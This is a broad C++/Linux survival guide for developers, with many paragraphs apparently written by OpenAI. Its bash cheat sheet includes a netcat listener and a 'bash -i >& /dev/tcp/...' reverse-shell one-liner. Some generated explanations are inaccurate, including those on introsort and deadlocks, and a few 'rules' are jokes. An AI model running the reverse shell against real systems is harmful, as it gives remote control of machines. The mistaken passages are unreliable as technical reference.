Teach yourself C++ in 45 years

A Computer Science survival guide for C++/Linux developers

Dean Turpin

Sat Mar 25 05:03:53 UTC 2023


An ode to C++

Let’s start with a haiku written by a computer.

A powerful friend
C++ is here for the long run
Friendly and strong code

This reference is a distillation of 15+ years of online logbook notes into only the essentials that remain relevant to a senior software developer today. Just for fun – and where the topic is readily available or established – I have reached out to OpenAI to provide a paragraph or two. Consequently, the exact content and the chapter order will vary each night. Hopefully this will keep repeat visits interesting and also prevent me from focusing all my attention on the first few chapters.

If time is tight, try the random daily chapter. And you can also raise a ticket on this repo.

The C++ Standard Library containers

The C++ Standard Library containers are a powerful and efficient way to organize data and store it for easy retrieval. They provide a consistent interface for manipulating data and enable users to easily access and manipulate data in a convenient and efficient manner. The containers also provide a range of features such as memory management, performance optimization, and scalability that can help make the development process easier and more efficient.

  1. vector: a sequence container that stores elements in contiguous memory locations
  2. list: a doubly linked list, which allows for efficient insertion and removal of elements
  3. deque: a double-ended queue that allows for efficient insertion and removal of elements from both ends
  4. map: an associative container that stores elements in key-value pairs
  5. set: a container that stores unique elements in a sorted order and allows for fast retrieval
  6. stack: a container that follows the Last-In-First-Out (LIFO) principle
  7. queue: a container that follows the First-In-First-Out (FIFO) principle
  8. priority_queue: a container that stores elements in a sorted order and allows for fast retrieval of the largest element

Categories of containers

Sequence containers are containers that store elements in a linear fashion, with the elements being laid out in a specific order based on their position within the container. Examples of sequence containers include vectors, deques, and lists.

Associative containers are containers that store elements in an organized fashion, with the elements being laid out in a specific order based on a key associated with each element. Examples of associative containers include maps, sets, and multisets.


Processor caches

Processor caches are small, high-speed memory caches built into a processor to reduce the average time required to access data from the main memory. Caches store frequently used instructions and data so that the processor can access them quickly, reducing latency and allowing the processor to operate more efficiently. Caches are divided into levels, with the fastest and smallest caches located closer to the processor core, and larger and slower caches located further away.

Cache coherence

Cache coherence is a mechanism that maintains the consistency of data stored in multiple caches, so that data accessed by one processor is the same as that accessed by another. It ensures that when one processor reads a shared memory location, it will see the most up-to-date value. Cache coherence is an important part of computer architecture that helps to maintain data integrity in a system with multiple processors.

Cache misses

There are three kinds of cache misses:

  1. Instruction read miss
  2. Data read miss
  3. Data write miss

Cache misses occur when a processor tries to access data from the cache, but the data is not present in the cache. This causes the processor to access the data from the main memory, resulting in a slower operation and increased latency. Cache misses can be caused by a variety of factors, including insufficient cache size, an inefficient cache design, or an attempt to access data that was evicted from the cache due to memory constraints.

Data cache

Instruction cache

Virtual functions

The way virtual functions work may cause issues with caching.

  1. Load vtable pointer: potentially data cache miss
  2. Load virtual function pointer: potentially data cache miss
  3. Then code of function is called: potential instruction cache miss

But we may be able to use CRTP to avoid the first two.

Cache oblivious algorithm design

Typically a cache-oblivious algorithm works by a recursive divide and conquer algorithm, where the problem is divided into smaller and smaller sub-problems. Eventually, one reaches a sub-problem size that fits into cache, regardless of the cache size.

Data-oriented design

Design to get the most value out of every single cacheline that is read. Split apart the functions and data.

Cache locality

Cache locality is the tendency of a processor to access the same set of data or instructions repeatedly. It refers to the physical proximity of related data and instructions in memory. High cache locality can improve performance by reducing the number of memory accesses required to process a given set of data or instructions, reducing the amount of time spent waiting for memory accesses to complete.

Further reading


Typically parallelism makes you think “threads within a process” but it’s worth considering different points in the processing that could be executed/calculated in parallel.

Kinds of parallelism

The iron law of performance!

See wikipedia.

time/program = instructions/program * clockCycles/instruction * time/clockCycle

Amdahl’s law

Amdahl’s law, named after computer scientist Gene Amdahl, is a concept in computer architecture that states that the theoretical speedup of a program using multiple processors in parallel computing is limited by the time needed for the sequential fraction of the program. In other words, the speedup that can be achieved by adding more processors is limited by the portion of the program that cannot be parallelized.

It’s very easy to optimise the bits you are familiar with, but not obvious how much your efforts will benefit the overall process: spend your time on the bottlenecks.

C++ linkage

Internal Linkage: Internal linkage is a type of linkage that restricts visibility of an object or function to the same translation unit. Objects or functions with internal linkage can only be accessed within the same translation unit. This is done by using the static keyword before the type and name of the object or function.

External Linkage: External linkage is a type of linkage that allows an object or function to be accessed from outside the translation unit in which it is declared. Objects or functions with external linkage can be accessed from any translation unit. This is done by not using the static keyword before the type and name of the object or function.

Dependencies on static variables in different translation units are, in general, a code smell and should be a reason for refactoring.


If an object or function inside such a translation unit has internal linkage, then that specific symbol is only visible to the linker within that translation unit. If an object or function has external linkage, the linker can also see it when processing other translation units. The static keyword, when used in the global namespace, forces a symbol to have internal linkage. The extern keyword results in a symbol having external linkage.

Anonymous namespaces

Used to declare many things with internal linkage.

namespace {
  int a = 0;
  int b = 0;
  int c = 0;
} // namespace

C++ standards

Features of note since C++11.


From the presentation by Marc Gregoire (CppCon 2022).

Not implemented yet

Ranges and views (part two)

A lot of effort has gone into ranges and views in C++23.






C++14 is an extension and improvement of C++11.


Binary structure

See Linux Debuginfo Formats - DWARF, ELF, dwo, dwp - What are They All? - Greg Law - CppCon 2022.

  1. Text (code) segment: This segment contains the actual machine code instructions of the program, along with read-only data such as string literals.

  2. Data segment: This segment contains initialized global and static variables.

  3. BSS segment: This segment contains uninitialized (zero-initialized) global and static variables.

  4. Heap segment: This segment is used for dynamic memory allocation during the run-time of the program.

  5. Stack segment: This segment stores local variables and function calls. It is also used for parameter passing between functions.

Move semantics

This is a large, complicated topic. See C++ Move Semantics - The Complete Guide by Nicolai M. Josuttis.

The rules of code

  1. A single file should contain fewer than 20000 lines of code
  2. It would be nice if a single routine could fit into 1000 lines of code
  3. Ensure comments are ignored by prefixing “todo”
  4. Use consistent formatting; even better, don’t bother and let clang-format do it
  5. Make everything constant, it’s much easier to reason about code when the data are immutable
  6. Unit testing is awesome and will almost certainly catch on

Unit testing

A test is not a unit test if:

See the complete article.

The magnitude of it all

In 2014 Randall Munroe estimated that Google stores 10 exabytes of data across all of its operations. However, as a C++ developer, you will only come across at most petabytes of storage; and if CPUs are topping out at gigahertz, then you won’t see anything much faster than a nanosecond.

                        1 000  kilo | milli .001
                    1 000 000  mega | micro .000 001
                1 000 000 000  giga | nano  .000 000 001
            1 000 000 000 000  tera | pico  .000 000 000 001
        1 000 000 000 000 000  peta | femto .000 000 000 000 001
    1 000 000 000 000 000 000   exa | atto  .000 000 000 000 000 001
1 000 000 000 000 000 000 000 zetta | zepto .000 000 000 000 000 000 001

See list of SI prefixes.

You may be tempted to use binary prefixes to be more precise – kibi, mebi, gibi, etc – but most people won’t know what you’re talking about. Also, manufacturers tend to use 1000^3 rather than 1024^3 because it makes their capacities look bigger.

Important speeds you should be aware of

See why is everyone in such a rush?

1/1000000000 second == 1 nanosecond 

Approximate durations of typical operations (rounded to help remember.)

Action Duration (nanoseconds)
L1 cache read / variable increment <1
Branch misprediction 5
L2 cache read / std::atomic increment 10
Mutex lock/unlock / std::scoped_lock 20
Fetch from main memory 100
Send 2KiB over 1Gbps network 20,000
Create a std::thread 20,000
Send packet from US to Europe and back 200,000,000

Object-oriented programming

Object-oriented programming (OOP) is a programming language model organized around objects rather than "actions" and data rather than logic. It attempts to simulate the real world by creating objects that contain data and code to manipulate that data. OOP languages allow developers to create objects that can be reused in different programs. This modularity allows for more efficient development and maintenance of programs. OOP emphasizes the concept of inheritance, which allows objects to acquire the properties and behaviours of the objects from which they are derived. This allows for code reuse and reduces the need for rewriting code. OOP also encourages the use of abstraction, which reduces the amount of code needed to solve a problem. In addition, OOP facilitates the use of polymorphism, which allows the same code to be used for different types of objects.


Polymorphism refers to the ability for different types of data to be treated the same way. There are two main types of polymorphism:

  1. Ad-hoc polymorphism: a function or operator behaves differently depending on the types of its arguments, with a separate implementation supplied for each type. Function and operator overloading in languages such as Java and C++ are examples.

  2. Parametric polymorphism: a single, generic implementation works uniformly across many types, with the type supplied as a parameter. C++ templates and generics in languages such as Haskell and ML are examples.

Virtual destructors

A standard question at interviews! A very nuanced feature of OOP in C++ but you can now test this at compile time with type traits.

Destructors must be declared virtual when the class contains virtual functions or is part of a polymorphic hierarchy. This ensures that the destructor of a derived class is called if it is deleted via a pointer to the polymorphic base class.

Virtual function specifier

The virtual specifier specifies that a non-static member function is virtual and supports dynamic dispatch. It may only appear in the decl-specifier-seq of the initial declaration of a non-static member function (i.e., when it is declared in the class definition).

In derived classes, you should mark overridden methods as override to express intention and also protect from the base class being changed unwittingly.

Virtual tables

A non-virtual class has a size of 1 because in C++ classes can’t have zero size (objects declared consecutively can’t have the same address.)

A virtual class has a size of 8 on a 64-bit machine because there’s a hidden pointer inside it pointing to a vtable. vtables are static translation tables, created for each polymorphic class.


RAII (Resource Acquisition Is Initialization) is a technique used in object-oriented programming to ensure that resources are properly allocated, released, and managed. It is achieved by tying the lifetime of the resource to the lifetime of an object. When the object is created, its resources are acquired, and when the object is destroyed, the resources are released. This ensures that resources are always released in a timely manner and helps prevent memory leaks and other resource-related issues.

C++ function parameters

For simple readonly types, pass by const value.

void func(const int p) { /* read p */ }

For large readonly types – i.e., larger than a pointer – pass by const reference. You should also consider if the type is trivially copyable: requiring a shallow or deep copy.

void func(const big_type& p) { /* read p, no copy made */ }

If the first thing you do is make a copy, pass by non-const value.

void func(int p) { /* p is our own copy */ }

If you want to modify the caller’s copy, pass by non-const reference.

void func(int& p) { /* writes to p are seen by the caller */ }

class or struct?

The only difference between a class and a struct is the default access level: members of a struct are public by default, members of a class private (the same applies to inheritance).

But typically a struct is used for “plain old data” or memory-mapped data where you want the members to be laid out in a predictable way (virtuals/inheritance add the complication of a vtable pointer.)

Either way, you can test your assertions at compile time with static_assert and the type traits header.

struct A {
  // public: <-- default for structs
  int x_;
};

If the data are constrained by an invariant – i.e., not all values are valid – use a class.

class B {
  private: // <-- default for classes
  int x_; // must be between 0-1000
};


“Please Do Not Take Salami Pizza Away”

See OSI on Wikipedia.

Layer Function
Layer 7 Application
Layer 6 Presentation
Layer 5 Session
Layer 4 Transport
Layer 3 Network
Layer 2 Data Link
Layer 1 Physical

Three way handshake

The TCP three-way handshake is a process that is used in a TCP/IP network to establish a connection between a local host/client and a remote host/server. It is a three-step process that requires both the client and server to exchange SYN and ACK (acknowledgement) packets before actual data communication begins.

  1. The client sends a SYN packet to the server, requesting to open a connection.

  2. The server responds with a SYN-ACK packet, acknowledging the request and confirming that the connection can be opened.

  3. The client responds with an ACK packet, acknowledging the server’s SYN-ACK packet and confirming that the connection is established.

Once this three-way handshake is complete, the client and server can communicate and exchange data.

SYN stands for “synchronise”.

=> SYN
<= SYN-ACK
=> ACK
=> HTTP (request)
<= ACK
<= HTTP (response)
=> ACK
=> FIN
<= ACK

Template metaprogramming

“Generic programming is why we can’t have nice things” – Andrei Alexandrescu

Template metaprogramming (TMP) is a technique used in C++ programming that utilizes template classes and functions to generate code at compile-time, as opposed to run-time. TMP is often used to improve the performance of code by removing the need for dynamic memory allocation and reducing the amount of code that needs to be written. It is also used to write generic code that can be used with any type of data structure or object. TMP can be used to solve complex problems that would otherwise be difficult to code. Examples of TMP include type traits, compile-time assertions, and recursive templates.

Templates are an important part of the C++ Standard Library, as they provide a way to create generic, type-independent algorithms and data structures. Templates allow developers to write code that can be reused with any type of data, without needing to rewrite the code for each specific data type. This reduces the amount of time and effort required to develop a program, as well as making it much easier to maintain and debug. Templates are used in the C++ Standard Library to define classes, such as containers and iterators, as well as algorithms, such as sorting and searching.


SFINAE (Substitution Failure Is Not An Error) is a C++ concept that allows for the substitution of non-matching function templates without causing a compiler error. It works by ignoring any substitution that would cause a compiler error and then substituting the next viable template. This allows for more flexible template programming, as it allows for different templates to be used in different scenarios.

What are the most difficult concepts in computer science?


As a Linux developer you need a strong command line game. bash is ubiquitous, and a powerful language in itself, without resorting to something like Python.


git is awesome on the command line and pretty much essential. Use it to manage your chores.

See how to undo almost anything with git.

Send a string to an IP/port

(echo hello; sleep 1) | telnet 80
echo hello > /dev/tcp/
echo hello | nc localhost 80

Reverse shell

# server
nc -knvlp 3389

# client
bash -i >& /dev/tcp/server_ip/3389 0>&1

Target everything but one file

git add !(unit.md)
shuf -n 1 readme.txt

From bash 5.




The three load average values are 1, 5 and 15 minutes.

15:29:28 up 20:23, 0 users, load average: 5.08, 1.49, 0.51


Stress your system in different ways.

stress --cpu 8
echo $(nproc)

Synonyms for localhost

localhost
127.0.0.1
127.1
::1
0 # wut

Move a file out of the way

mv {,_}.bash_history

Repeat a command

watch -d ip a

pushd equivalent

I use this all the time. Rather than pushd and popd to navigate around the file system:

# Navigate to new dir
cd ~/deanturpin.gitlab.io/content/post

# Return whence you came
cd -


You should be comfortable explaining the complexity of your code. See the Big O Cheatsheet.

Complexity Definition
Constant O(1)
Logarithmic O(log n)
Linear O(n)
Linearithmic O(n log n)
Quadratic O(n^2)
Cubic O(n^3)
Exponential O(2^n)

Comparing two fundamental data structures

Linked lists and arrays have different complexities depending on the operation being performed. Random access into an array is O(1), while reaching an element of a linked list is O(n); conversely, inserting or removing at a known position is O(1) for a linked list but O(n) for an array. Arrays also tend to be faster in practice thanks to cache locality, but linked lists offer more flexibility for dynamic data structures.


Multi-threaded concepts are important: e.g., atomics, locks, issues with different designs, how to make things thread safe.


tl;dr “A computer program or subroutine is called reentrant if multiple invocations can safely run concurrently on a single processor system.”

Reentrancy is a property of a function that allows it to be safely interrupted part-way through and invoked again (“re-entered”) before the earlier invocation has completed. A reentrant function typically avoids mutable static and global state, doesn’t return pointers to static data, and calls only other reentrant functions. Note this is distinct from recursion, although reentrant code is usually also safe to call recursively.

Race conditions

tl;dr “Race condition: an unfortunate order of execution causes undesirable behaviour.”

A race condition in computer science is a situation or sequence of events where the output of a program or system is dependent on the timing or order of other events. This can occur when multiple threads or processes access shared resources in a shared environment without proper synchronization. In this case, the order in which the threads or processes run can affect the outcome of the program. If one thread runs before another, it can take ownership of the shared resource, causing the second thread to fail or return an incorrect result. Race conditions can cause unpredictable results or even system crashes.


Deadlocks and livelocks

Deadlocks and livelocks are both types of system resource contention that can occur in computer systems.

Deadlocks occur when two or more processes are waiting for the same resources and neither can continue until those resources are released by the other process. This creates an impasse where neither process can make any progress.

Livelocks, on the other hand, are situations where two or more processes continually change their state in response to one another – for example, each repeatedly backing off and retrying to acquire the same resources – without any of them ever making progress.

Avoiding deadlocks

Run your code on different numbers of CPUs. It’s interesting how the bottlenecks move around depending on the available resources; and it’s really easy to write software that doesn’t run on one core.

  1. Make sure that all transactions are short and efficient.

  2. Ensure that all transactions acquire locks in the same order.

  3. Use timeouts to avoid waiting for a resource that is locked by another transaction.

  4. Avoid using nested transactions.

  5. Use a deadlock detection and resolution mechanism to detect and resolve deadlocks.

  6. Minimize the number of locks per transaction.

  7. Use a read-committed isolation level.

  8. Monitor and analyze deadlock logs.

See also


Synchronising threads

A mutex is a synchronization primitive that allows only one thread to access a resource at a time. It is used to protect shared resources from concurrent access. A semaphore is a synchronization primitive that allows multiple threads to access a resource at a time. It is used to control access to a shared resource by several processes. A mutex is typically used to provide exclusive access to a resource, while a semaphore is used to control access to a resource by multiple processes.

See Mutex vs Semaphore

Threads versus processes

tl;dr A thread is a branch of execution. A process can consist of multiple threads.

Threads are a subset of processes. A process is a program in execution, while a thread is a single flow of control within the process. A process can contain multiple threads, which share the same address space and can communicate with each other. Threads have less overhead than processes, and so they can be used to improve the performance of an application.

Thread best practice


Hash functions

A hash function is a mathematical algorithm that takes an input of any size and produces an output of a fixed size. It is used to provide a digital fingerprint of a piece of data and is typically used in cryptography and data security applications.

Properties of a hashing algorithm

String hashing

Design patterns

Design patterns are reusable solutions to commonly occurring problems in software design. The objective of design patterns is to provide developers with a reliable, easy-to-understand set of instructions for tackling a particular problem. They also provide a common language for developers to communicate about problems and solutions. Design patterns can help developers create more flexible, maintainable, and scalable code.


Common patterns

  1. Factory Pattern
  2. Singleton Pattern
  3. Adapter Pattern
  4. Facade Pattern
  5. Observer Pattern
  6. Command Pattern
  7. Strategy Pattern
  8. Template Pattern
  9. Iterator Pattern
  10. Composite Pattern
  11. Prototype Pattern
  12. State Pattern
  13. Proxy Pattern
  14. Decorator Pattern

Factory pattern

The Factory Design Pattern is a software design pattern that is used to create objects or products. This pattern provides a way to create objects without exposing the creation logic to the client and refers to the newly created object using a common interface. It is one of the most commonly used creational patterns due to its simplicity.

The Factory Design Pattern consists of four components: a product interface, a concrete product, a factory interface, and a concrete factory. The product interface defines the interface of the product object and any methods or properties that the object must have. The concrete product is an implementation of the product interface. The factory interface defines the interface of the factory object and any methods or properties that the factory must have. The concrete factory is an implementation of the factory interface that is responsible for creating the product object.

The Factory Design Pattern can be used in scenarios where the type of object to be created is not known until runtime. It also enables the client to create objects without having to specify the exact type of object to be created. This pattern also allows the client to create a single instance of an object and use it throughout the application.

The Factory Design Pattern is a useful tool to keep code organized, flexible, and extensible. It also provides a way to create objects in an easily testable manner. This pattern encourages code reuse and makes it easier to maintain code by isolating the creation process from the rest of the application.


Store a system configuration in an external text file and construct at runtime using the factory pattern.

Visitor pattern

The Visitor Design Pattern is a behavioral software design pattern that allows for the separation of an algorithm from an object structure on which it operates. It is one way to follow the open/closed principle. This pattern allows for a new operation to be added to a set of classes without having to modify any of the existing classes. It is often used when an object structure contains many objects of different types, and you need to perform an operation on all of them. The Visitor Pattern defines a new operation to a class without changing the class. Instead, a visitor class is created that takes the object reference as input, and then implements the operation. This makes it possible to add new operations to existing object structures without changing the objects themselves.

Double dispatch

The visitor pattern exploits a feature of subtype polymorphism named “double dispatch.”

Double dispatch in subtype polymorphism is a technique where two objects of different types are used to determine the behavior of a method. This technique occurs when a method call is made on an object and the method is dispatched based on both the type of the method and the type of the object being called. This allows for different behavior to be executed depending on the types of the objects being used. Double dispatch is an interesting technique as it enables an object to respond differently to a method call depending on the type of the object it is called on.


Create a class hierarchy of shapes and define methods that operate on those shapes in a visitor class.

Flyweight / singleton / memento

Hardware interface classes will typically be a const register map which is a flyweight pattern. This is also an example of a singleton pattern as it’s only initialised once regardless of how many instances are created. Additionally if registers are actually wired to discrete lines they might be read-only, so the memento pattern is used to store the internal state.


“In computer science, reflection is the ability of a process to examine, introspect, and modify its own structure and behavior.”

See Wikipedia.

Dependency inversion

Dependency inversion is a software design principle that states that high-level modules (e.g. business logic) should not depend on low-level modules (e.g. database access), but rather be decoupled from them. This helps to reduce the complexity of the software architecture and make it more extensible.


  1. Single Responsibility Principle (SRP)
  2. Open/Closed Principle (OCP)
  3. Liskov Substitution Principle (LSP)
  4. Interface Segregation Principle (ISP)
  5. Dependency Inversion Principle (DIP)
  6. Demeter’s Law (Law of Demeter)


Less common but another set of principles to consider.

  1. Make things visible: Make information, objects, and actions visible to the user.
  2. Give direct manipulation: Allow users to directly manipulate objects to achieve the desired outcome.
  3. Strive for consistency: Use consistent language, organization, and navigation to reduce cognitive load.
  4. Offer shortcuts: Provide shortcuts and alternate methods to reduce the number of steps necessary to achieve a desired outcome.
  5. Offer feedback: Provide feedback on user actions so that users can understand the consequences of their actions.
  6. Design for error: Anticipate errors and design to prevent or minimize them.
  7. Think and work in parallel: Allow users to think and work in parallel by using multiple views, perspectives, and techniques.
  8. Provide support for recognition: Allow users to recognize objects and concepts instead of having to remember them.
  9. Use natural mapping: Use natural mappings so that users can easily understand and learn how to use the system.
  10. Use recognition rather than recall: Allow users to recognize objects and concepts instead of having to remember them.
  11. Provide help and documentation: Provide online help and documentation so users can get the information they need to use the system.

Data structures

It’s important to know the common data structures and their characteristics.

  1. Arrays
  2. Linked Lists
  3. Stacks
  4. Queues
  5. Trees
  6. Heaps
  7. Graphs
  8. Hash Tables
  9. Tries


std::vector is the go-to container, so let’s give it some special attention. It has contiguous storage – therefore cache friendly – and uses the RAII paradigm: the data are created on the heap and the allocation and deallocation (new/delete) are handled for you. Interestingly, std::string exhibits many of the same characteristics, but it’s not quite containery enough to qualify.

How does my vector grow?

Estimate how many times the fax destructor is called below.

#include <cstddef>
#include <iostream>
#include <vector>

auto x = 0uz;

int main() {
    struct fax {
        // Default constructor and destructor
        fax() { std::cout << x << " ctor\n"; }
        ~fax() { std::cout << "\t" << x << " dtor\n"; }

        // Copy and move constructors
        fax(const fax&) { std::cout << x << " copy ctor\n"; }
        fax(fax&&) { std::cout << x << " move ctor\n"; }

        // Copy and move assignment operators
        fax& operator=(const fax&) {
            std::cout << x << " copy assignment ctor\n";
            return *this;
        }
        fax& operator=(fax&&) {
            std::cout << x << " move assignment ctor\n";
            return *this;
        }

        const std::size_t id = x++;
    };

    std::vector<fax> y;

    // Reduce copies by allocating up front
    // y.reserve(3);

    for (std::size_t i = 0; i < 3; ++i) {
        y.push_back(fax{});
        std::cout << "-- capacity " << y.capacity() << " --\n";
    }

    // fax f1 = fax{};
    // fax f2 = std::move(fax{});
}

See the program output below; note how the capacity grows exponentially (doubling each time with this implementation).

1 ctor
2 move ctor
    2 dtor
-- capacity 1 --
3 ctor
4 move ctor
5 copy ctor
    5 dtor
    5 dtor
-- capacity 2 --
6 ctor
7 move ctor
8 copy ctor
9 copy ctor
    9 dtor
    9 dtor
    9 dtor
-- capacity 4 --
    9 dtor
    9 dtor
    9 dtor

For each push we call the default constructor to create a temporary object and then the move constructor to move it into the new element… so far so good. But crucially, when the vector is resized we must also copy all the existing elements into the new allocation (copied rather than moved here, because our move constructor is not marked noexcept). Not an issue for this simple case, but if the class is expensive to copy there could be trouble ahead. Additionally, if there's a bug in the copy constructor, we may be corrupting existing valid data simply by copying it around.

Binary search trees

std::set and std::map are typically implemented using a red-black tree, a type of self-balancing binary search tree. C++23 introduces std::flat_map, which uses contiguous storage to make it more cache-friendly.

Binary search trees (BST) are a type of data structure that operates on a tree-like structure and has the following properties:

  1. Each node in the tree contains a single data element
  2. The tree is sorted in such a way that for each node, all elements in its left subtree are less than or equal to the node, and all elements in its right subtree are greater than the node.
  3. Each subtree is itself a binary search tree.

Binary search trees are used to store and quickly retrieve data. They are commonly used for dictionary and symbol table implementations.

Self-balancing binary search trees

A balanced tree is one of height O(log n), where n is the number of nodes in the tree. It is a sorted hierarchy of data where the leftmost node is the smallest, and the rightmost node is the largest.

Below, each node of a binary search tree is itself the top of a mini tree; the top of the whole tree is the middle element.

e|            /e          
d|           d            
c|          / \c          
b|         b              
a|        / \ /a          
9|-----  /   9            
8|      /     \8          
7|     7                  
6|      \     /6          
5|-----  \   5            
4|        \ / \4          
3|         3              
2|          \ /2          
1|           1            
0|            \0          

Hash tables

Hash tables have an amortized complexity of O(1) unless there are collisions. Worst case, if everything is in the same bin, then it is O(n). Additionally, if the proportion of occupied slots – known as the “load factor” or “fill ratio” – exceeds a threshold, then the hash table must be resized/rebuilt.

std::unordered_set and std::unordered_map are implemented using hash tables.


Heaps

A heap is a useful data structure when it is necessary to repeatedly remove the object with the highest (or lowest) priority.

Support of random access iterators is required of the underlying container to keep a heap structure internally at all times. Note a heap is only partially sorted: only the root element is guaranteed to be the extremum.


Projecting down, the top of the tree is the smallest element.

       1
      / \
     /   \
    /     \
   2       3
  / \     / \
 4   5   6   7
/ \ / \ / \ / \
8 9 a b c d e f

Comparison of heaps and binary search trees

A heap is a data structure that is typically used to implement a priority queue, where elements are organized in a tree-like structure with the highest priority elements at the top. A binary search tree is a data structure used to store sorted data in which each node contains a value and two pointers, one pointing to a node with a value less than the current node and one pointing to a node with a value greater than the current node. A binary heap is always a complete tree, so it is inherently balanced, while a binary search tree must be explicitly balanced (e.g., as a red-black tree) in order to maintain a logarithmic search time.

Singly linked lists

Adding/removing at the beginning is O(1), but adding at the end means traversing the whole list, therefore O(n). Searching is also O(n).

std::forward_list is a singly linked list.

Doubly linked lists

Like a singly linked list but we can iterate both ways. It stores a pointer to both the beginning and end, therefore operations on the end are also O(1).

std::list is a doubly linked list.

C++ Standard Library container complexities

Container      Insert     Delete     Access     Search
vector         O(1)*      O(n)       O(1)       O(n)
deque          O(1)       O(n)       O(1)       O(n)
list           O(1)       O(1)       O(n)       O(n)
set            O(log n)   O(log n)   O(log n)   O(log n)
map            O(log n)   O(log n)   O(log n)   O(log n)
unordered_set  O(1)†      O(1)†      O(1)†      O(1)†
unordered_map  O(1)†      O(1)†      O(1)†      O(1)†

*O(1) amortized constant time when inserting at the end
†O(1) on average; O(n) worst case when everything hashes to the same bucket

However, the conventional CS wisdom for when to use a linked list over contiguous storage hasn’t applied for years: you have to measure. E.g., if a container fits in the cache, a vector might outperform everything.

Creating threads in C++

This is all a lot easier since std::thread was introduced in C++11. Now we have a platform-independent interface.

See the C++ concurrency support library examples.

However, remember there is an overhead in creating a thread: if the operation you’re repeating is quick, it could actually take longer to parallelise. You need to profile: how long does it take just to create a thread?

Ways to create a thread


std::async

Think of it like pushing a calculation into the background. std::async executes a function asynchronously and returns a std::future that will eventually hold the result of that function call. Quite a nice way to reference the result of a calculation executed in another thread.


std::thread

You need to call join() for every thread created with std::thread. Typically it’s done by storing your threads in a vector and joining each of them in a loop.


std::jthread

Like a regular thread but you don’t have to join it in the caller: it joins for you in the destructor. Quite nice to not have to remember to join, although joining all your threads manually can be a convenient synchronisation point.

Execution policies

Many of the Standard Library algorithms can take an execution policy, which is quite an exciting way to parallelise existing code. But remember it offers no protection of shared data: it’s still just a bunch of threads.

C++ algorithms that can take an execution policy

Some of these have an _if version that takes an additional predicate: e.g., std::replace and std::replace_if.

  1. std::sort
  2. std::copy
  3. std::transform
  4. std::accumulate
  5. std::for_each
  6. std::reduce
  7. std::inclusive_scan
  8. std::exclusive_scan
  9. std::transform_reduce
  10. std::remove
  11. std::count
  12. std::max_element
  13. std::min_element
  14. std::find
  15. std::generate

Acquiring resources


std::mutex is the standard way to protect access to a shared resource, but there are multiple RAII wrappers for locking and unlocking it: std::lock_guard, std::unique_lock and std::scoped_lock.

Acquiring multiple resources

Here be dragons! In the shape of deadlocks. There are several strategies to improve your chances of not becoming stuck; see the deadlock chapter for more.

You can use std::scoped_lock with a single resource or multiple; when given several mutexes it locks them all using a deadlock-avoidance algorithm. I also think it expresses intention better, by virtue of having “scope” in the name.

Standard library threading types

See the Standard Library concurrency support library.

Let’s ask OpenAI to write a producer-consumer solution in C++

#include <condition_variable>
#include <iostream>
#include <mutex>
#include <queue>
#include <thread>

std::mutex m;
std::condition_variable cv;
std::queue<int> q;

const std::size_t BufferSize = 10;

void producer() {
  for (int i = 0; i < 50; i++) {
    std::unique_lock<std::mutex> lk(m);
    cv.wait(lk, [] { return q.size() < BufferSize; });
    q.push(i);
    std::cout << "Produced " << i << std::endl;
    lk.unlock();
    cv.notify_all();
  }
}

void consumer() {
  for (int i = 0; i < 50; i++) {
    std::unique_lock<std::mutex> lk(m);
    cv.wait(lk, [] { return !q.empty(); });
    const int item = q.front();
    q.pop();
    std::cout << "Consumed " << item << std::endl;
    lk.unlock();
    cv.notify_all();
  }
}

int main() {
  std::thread t1(producer);
  std::thread t2(consumer);
  t1.join();
  t2.join();
  return 0;
}

The Jonathan Boccara CppCon talk 105 STL Algorithms in Less Than an Hour is well worth a watch for a quick overview.


Quicksort

Quicksort is the poster boy of sorting algorithms.

The average time complexity of quicksort is O(n log n), degrading to O(n²) in the worst case; in practice it is usually much faster than other sorting algorithms like insertion sort and bubble sort.

Below is a Python implementation just for fun. But how is it implemented in C++?

def quicksort(arr):
    if len(arr) <= 1:
        return arr
    pivot = arr[len(arr) // 2]
    left = [x for x in arr if x < pivot]
    middle = [x for x in arr if x == pivot]
    right = [x for x in arr if x > pivot]
    return quicksort(left) + middle + quicksort(right)

# Sample input
arr = [3, 6, 8, 10, 1, 2, 1]

# Sample output
print(quicksort(arr)) # [1, 1, 2, 3, 6, 8, 10]

std::sort uses Introsort

Introsort is a hybrid sorting algorithm that combines the best aspects of both quicksort and heapsort. It is usually the default sorting algorithm used in the C++ Standard Template Library (STL). Introsort begins by sorting the data with quicksort. If the quicksort algorithm fails to make sufficient progress, it switches to heapsort. Introsort can also be tuned to switch to heapsort earlier to reduce the risk of quicksort’s worst-case performance. Introsort terminates when the data is sorted or the maximum recursion depth is reached. Introsort is an efficient and robust sorting algorithm with an average-case complexity of O(n log n).

Introsort is in place but not stable: i.e., equivalent elements are not guaranteed to remain in the same order. However, the Standard Library offers stable_ versions of various sorting algorithms.

If additional memory is available, stable_sort remains O(n log n). However, if it fails to allocate, it degrades to an O(n log² n) algorithm.


Small array threshold

The threshold for switching to insertion sort varies for each compiler.


std::sort requires random access to the elements, so std::list has its own sort method, but it still (approximately) conforms to O(n log n). It can be implemented with merge sort as moving elements is cheap with a linked list.

Other sorting algorithms

Considerations for choosing an algorithm: the size of the input, and the type of input, e.g., partially sorted or random.

The complexities of various sorting algorithms can vary greatly depending on the algorithm used and the complexity of the data being sorted. Generally speaking, the most common sorting algorithms have the following complexities:

  1. Bubble Sort: O(n²)
  2. Selection Sort: O(n²)
  3. Insertion Sort: O(n²)
  4. Merge Sort: O(n log n)
  5. Quick Sort: O(n log n)
  6. Heap Sort: O(n log n)

As you can see, Merge Sort, Quick Sort and Heap Sort are the most efficient algorithms, as they have the lowest complexity. Bubble Sort, Selection Sort and Insertion Sort are the least efficient algorithms, as they have the highest complexity.

All of the O(n log n) algorithms are Θ(n log n) in all cases, apart from Timsort, which has a best case of Ω(n), and quicksort, which has a terrible O(n²) worst case (if we happen to always pick the worst pivot). Quicksort is a good all-rounder with an O(n log n) average case. It is said that the worst case can be avoided by picking the pivot carefully, but for any deterministic pivot choice an input can be constructed where the chosen pivot is always the worst case.